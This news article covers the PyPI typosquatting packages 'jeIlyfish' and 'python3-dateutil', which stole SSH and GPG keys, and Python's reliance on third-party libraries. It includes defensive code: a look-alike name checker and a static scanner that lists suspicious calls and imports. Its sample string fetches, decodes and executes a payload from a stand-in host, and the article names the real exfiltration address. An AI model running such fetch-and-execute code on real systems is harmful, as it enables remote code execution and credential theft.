Fake Third-Party Python Libraries Are Stealing Information, Is Python’s Popularity In Danger?

The Python Package Index (PyPI) team removed two fake libraries after a German developer, Lukas Martini, reported that the packages were stealing sensitive information. Python was released almost three decades ago, but it has been widely embraced only in the last few years, driven by the growth of third-party libraries for artificial intelligence and data science.

However, these very libraries could become the prime reason for Python’s downfall. This is not the first time PyPI has been infiltrated by packages that extract information: three earlier incidents occurred in July 2019, October 2018, and September 2017.

The Incident

Typosquatting, a form of cybersquatting that takes advantage of typos made by users, was used to deceive developers and gain access to sensitive data. The idea is to register a look-alike of a genuine package name, so that a developer who makes a typo installs the phoney library instead of the desired one. As the fake library is designed to work like the genuine one, developers do not notice any discrepancy.

The two libraries were “jeIlyfish” and “python3-dateutil”, which mimic the popular “jellyfish” and “dateutil” libraries (the latter is published on PyPI as “python-dateutil”). The fake “jeIlyfish” has a capital I in place of the first lowercase L, and “python3-dateutil” uses “python3” instead of “python” in its name.
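The look-alike trick described above can be caught mechanically in simple cases. The following is a minimal sketch, not a method used by PyPI: it assumes a hypothetical allow-list `KNOWN_PACKAGES`, a hand-picked table of confusable characters, and an arbitrary similarity cutoff of 0.85, and it relies only on the standard-library `difflib` module.

```python
import difflib

# Hypothetical allow-list of packages a team actually intends to install.
KNOWN_PACKAGES = ["jellyfish", "python-dateutil", "requests", "numpy"]

# Characters that look alike in many fonts, mapped to one canonical form.
# This table is an illustrative assumption, not an exhaustive list.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})


def normalise(name):
    """Collapse confusable characters, then lowercase the name."""
    return name.translate(CONFUSABLES).lower().replace("_", "-")


def lookalike_of(name, known=KNOWN_PACKAGES, cutoff=0.85):
    """Return the known package that `name` imitates, or None.

    An exact match with a known package is treated as legitimate.
    """
    if name in known:
        return None
    canonical = {normalise(k): k for k in known}
    hits = difflib.get_close_matches(
        normalise(name), list(canonical), n=1, cutoff=cutoff
    )
    return canonical[hits[0]] if hits else None


for candidate in ["jeIlyfish", "python3-dateutil", "requests", "flask"]:
    print(candidate, "->", lookalike_of(candidate))
```

With this allow-list, both fake names from the incident are flagged as imitations of their genuine counterparts, while an exact or unrelated name is not. A heuristic like this can produce false positives for legitimately similar names, so it is better suited to prompting a second look than to blocking installs outright.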

However, the malicious code was present only in ‘jeIlyfish’ and not in ‘python3-dateutil’ itself. The latter imported the former in its Python file, thereby making ‘python3-dateutil’ malicious as well.

It was reported that, once installed, the library downloaded a file named ‘hashsum’, which decoded into a Python file and was executed to exfiltrate SSH and GPG keys from the developer’s computer. The stolen information, which also included the list of repositories, the home directory, and the PyCharm projects directory, was then sent to http://68.183.212.246:32258.
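Behaviour of this kind, fetching a payload, decoding it, and executing it, tends to leave traces in source code that a static scan can surface before anything runs. The sketch below is a rough illustration under stated assumptions: the sets `SUSPICIOUS_CALLS` and `SUSPICIOUS_MODULES` are hypothetical choices, and the sample string is made up for the demonstration rather than taken from the actual malicious package. It uses the standard-library `ast` module, which parses code without executing it.

```python
import ast

# Illustrative assumptions: calls and modules worth a closer look.
# Plenty of legitimate libraries use these too.
SUSPICIOUS_CALLS = {"exec", "eval"}
SUSPICIOUS_MODULES = {"base64", "zlib", "urllib", "socket", "requests"}


def flag_suspicious(source):
    """Return a sorted list of findings such as 'call:exec' or 'import:base64'."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            # Direct calls like exec(...) or eval(...)
            if node.func.id in SUSPICIOUS_CALLS:
                findings.add(f"call:{node.func.id}")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in SUSPICIOUS_MODULES:
                    findings.add(f"import:{root}")
        elif isinstance(node, ast.ImportFrom) and node.module:
            root = node.module.split(".")[0]
            if root in SUSPICIOUS_MODULES:
                findings.add(f"import:{root}")
    return sorted(findings)


# Made-up sample that downloads, decodes, and executes a payload.
# It is only parsed here, never run.
SAMPLE = (
    "import base64\n"
    "from urllib.request import urlopen\n"
    "exec(base64.b64decode(urlopen('http://example.invalid').read()))\n"
)

print(flag_suspicious(SAMPLE))
```

A scan like this only narrows down where a human reviewer should look. Obfuscated code can evade it, and harmless code can trigger it.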

After the developer reported the issue on 1 December, the PyPI team removed the libraries to prevent further attacks.

What Are Its Implications?

Unlike other prominent programming languages, Python banks heavily on third-party libraries. While this has helped Python proliferate, it also brings considerable security risk. When a developer installs a library, it usually pulls in modules from other vendors, and those modules can in turn include packages from unknown sources. This dependency chain can have a very long tail, which makes evaluating every package tedious.
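To get a sense of how long that tail is for a given package, the declared dependencies of installed distributions can be walked recursively. This is a minimal sketch assuming Python 3.8 or later, where the standard-library `importlib.metadata` module is available. The helper names `requirement_name` and `dependency_tree` are hypothetical, and the name parsing is deliberately simplified: it ignores version specifiers and environment markers and skips optional extras.

```python
import re
from importlib import metadata

_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def requirement_name(requirement):
    """Extract the distribution name from a requirement string, lowercased."""
    match = _NAME.match(requirement.strip())
    return match.group(0).lower() if match else None


def dependency_tree(package, seen=None):
    """Return the set of distribution names reachable from `package`.

    Only distributions installed in the current environment are followed.
    """
    seen = set() if seen is None else seen
    try:
        requirements = metadata.requires(package) or []
    except metadata.PackageNotFoundError:
        return seen  # not installed here, so nothing more to walk
    for requirement in requirements:
        if re.search(r"extra\s*==", requirement):
            continue  # optional extra, not installed by default
        name = requirement_name(requirement)
        if name and name not in seen:
            seen.add(name)
            dependency_tree(name, seen)
    return seen


# "pip" is only an example; any installed distribution name works.
print(sorted(dependency_tree("pip")))
```

Running this against a large data science package typically shows many names that the developer never asked for explicitly, each of which is code that runs with the same privileges as the rest of the project.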

Although the Python organisation checks new libraries for trustworthiness before they are integrated, the process is strenuous, so it cannot guarantee complete protection. Consequently, one can expect similar incidents in the future as well.

Is There A Solution?

Python cannot follow the approach of providing most of the libraries itself, similar to what Google does for Android development. Data science and AI are vast fields, and the Python organisation cannot keep pace with the new developments in this landscape.

And without third-party libraries, Python would be similar to other programming languages in data science and AI, with limited capabilities for manipulating data.

Granting third-party libraries access only with user permission could be a way forward, but it would solve only part of the problem, as packages would still have access to a great deal of information. And manually checking every imported library is cumbersome to manage.

Consequently, restricting permissions to directories and manual checking both remain ineffective solutions.

Outlook

Third-party libraries have always been a risk, and in the past developers held back from embracing them. But with the rising need for reusable code to innovate quickly in the AI landscape, relying on them became the new normal. The threat therefore remains, at least in libraries that are not widely used.

Python cannot be sustained without third-party libraries, but it quickly needs to find a way to detect malicious packages and protect developers from unknowingly adopting malevolent modules.

Rohit Yadav

Rohit is a technology journalist and technophile who likes to communicate the latest trends around cutting-edge technologies in a way that is straightforward to assimilate. In a nutshell, he is deciphering technology. Email: rohit.yadav@analyticsindiamag.com